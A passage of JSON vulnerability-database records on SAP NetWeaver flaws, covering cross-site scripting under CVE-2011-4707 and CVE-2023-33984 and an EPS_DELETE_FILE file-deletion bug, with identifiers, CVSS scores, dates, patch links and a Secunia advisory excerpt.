"title": "Patch for SAP NetWeaver Feature Access Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5922"
},
{
"title": "Patch for SAP NetWeaver Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5912"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5909"
},
{
"title": "Patch for SAP NetWeaver Path Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5911"
},
{
"title": "Patch for SAP NetWeaver \u0027page\u0027 parameter cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5910"
},
{
"title": "SAP Netweaver Script Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5908"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1546307"
},
{
"trust": 1.7,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=341"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=335"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4707"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4707"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=340http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=339http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=336http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=338http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=337http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/520554/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=339"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=340"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=338"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/50680"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2011-12-08T00:00:00",
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"date": "2011-11-15T00:00:00",
"db": "BID",
"id": "50680"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"date": "2011-12-08T19:55:03.720000",
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"date": "2013-02-14T12:21:00",
"db": "BID",
"id": "50680"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"date": "2018-12-10T19:29:00.420000",
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
}
],
"trust": 1.4
}
}
var-202306-0967
Vulnerability from variot
SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202306-0967",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33984"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33984"
}
]
},
"cve": "CVE-2023-33984",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.1,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-33984",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-33984",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202306-862",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "VULMON",
"id": "CVE-2023-33984"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-33984",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202306-862",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-33984",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-33984"
},
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"id": "VAR-202306-0967",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:45:56.457000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=242372"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33984"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3318657"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-33984/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-33984"
},
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-33984"
},
{
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-13T00:00:00",
"db": "VULMON",
"id": "CVE-2023-33984"
},
{
"date": "2023-06-13T03:15:09.567000",
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"date": "2023-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-13T00:00:00",
"db": "VULMON",
"id": "CVE-2023-33984"
},
{
"date": "2023-06-20T19:37:16.977000",
"db": "NVD",
"id": "CVE-2023-33984"
},
{
"date": "2023-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-site scripting vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-862"
}
],
"trust": 0.6
}
}
var-201108-0303
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The \"EPS_DELETE_FILE\" function has an input validation error, and an attacker submits a directory traversal sequence request to delete any file. To successfully exploit the vulnerability you need access to the default SAP account TMSADM or SAPCPIC. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing Find out more, take a free test drive, and share your opinion with us: http://secunia.com/blog/242
TITLE: SAP NetWeaver "EPS_DELETE_FILE" Arbitrary File Deletion Vulnerability
SECUNIA ADVISORY ID: SA45715
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45715/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45715
RELEASE DATE: 2011-08-27
DISCUSS ADVISORY: http://secunia.com/advisories/45715/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/45715/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45715
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Alexey Sintsov has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious users to manipulate certain data. TMSADM or SAPCPIC.
SOLUTION: Apply fixes. Please see the vendor's advisory for details.
PROVIDED AND/OR DISCOVERED BY: Alexey Sintsov, Digital Security Research Group (DSecRG).
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1554030
Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=331
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201108-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3380"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "104507"
}
],
"trust": 0.1
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The \\\"EPS_DELETE_FILE\\\" function has an input validation error, and an attacker submits a directory traversal sequence request to delete any file. To successfully exploit the vulnerability you need access to the default SAP account TMSADM or SAPCPIC. ----------------------------------------------------------------------\n\nThe Secunia CSI 5.0 Beta - now available for testing\nFind out more, take a free test drive, and share your opinion with us: \nhttp://secunia.com/blog/242 \n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver \"EPS_DELETE_FILE\" Arbitrary File Deletion Vulnerability\n\nSECUNIA ADVISORY ID:\nSA45715\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45715/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45715\n\nRELEASE DATE:\n2011-08-27\n\nDISCUSS 